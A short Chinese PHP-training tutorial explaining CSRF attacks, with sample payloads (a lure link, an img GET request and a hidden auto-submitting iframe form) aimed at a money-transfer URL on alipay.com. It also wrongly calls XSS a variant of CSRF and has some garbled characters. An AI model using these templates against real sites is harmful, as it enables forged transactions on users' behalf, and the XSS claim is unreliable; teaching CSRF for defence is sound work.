《PHP開發(fā)之CSRF的攻擊方式及原理》要點:
本文介紹了PHP開發(fā)之CSRF的攻擊方式及原理,希望對您有用。如果有疑問,可以聯(lián)系我們。
維易PHP培訓學院每天發(fā)布《PHP開發(fā)之CSRF的攻擊方式及原理》等實戰(zhàn)技能,PHP、MYSQL、LINUX、APP、JS,CSS全面培養(yǎng)人才。
CSRF全稱叫做,跨站哀求偽造.
便是黑客可以偽造用戶的身份去做一些操作,進而滿足自身目的.
這是哀求偽造的基本原理.那么支付寶驗證用戶身份的機制是什么呢?
偽造哀求的方式一般有如下幾種方式:
頁面中有一個超鏈接,誘導用戶進行點擊
<a href=”https://alipay.com?userid=3&money=9999”>iphone8提前曝光</a>
直接在頁面上使用Img進行g(shù)et哀求
<img src=”https://alipay.com?userid=3&money=9999”/>
或使用表單進行提交
<iframe name="heihei" style="display:none;"></iframe>
<formaction="https://alipay.com?userid=3&money=9999" method="post" target="heihei" >
<input name="userid" value="3" type="hidden" />
<input name="money" value="9999" type="hidden" />
</form>
<script>
window.onload = function(){
document.forms[0].submit();
}
</script>
除此之外,CSRF還有一個變種攻擊,叫做XSS
使用了腳本注入的原理,來進行更徹底的身份偽造.
以上是關(guān)于CSRF的攻擊方式及原理介紹,有興趣的同學可以自行試驗一番.
【文章轉(zhuǎn)載于:扣丁學堂微信"大眾號】
轉(zhuǎn)載請注明本頁網(wǎng)址:
http://www.snjht.com/jiaocheng/10579.html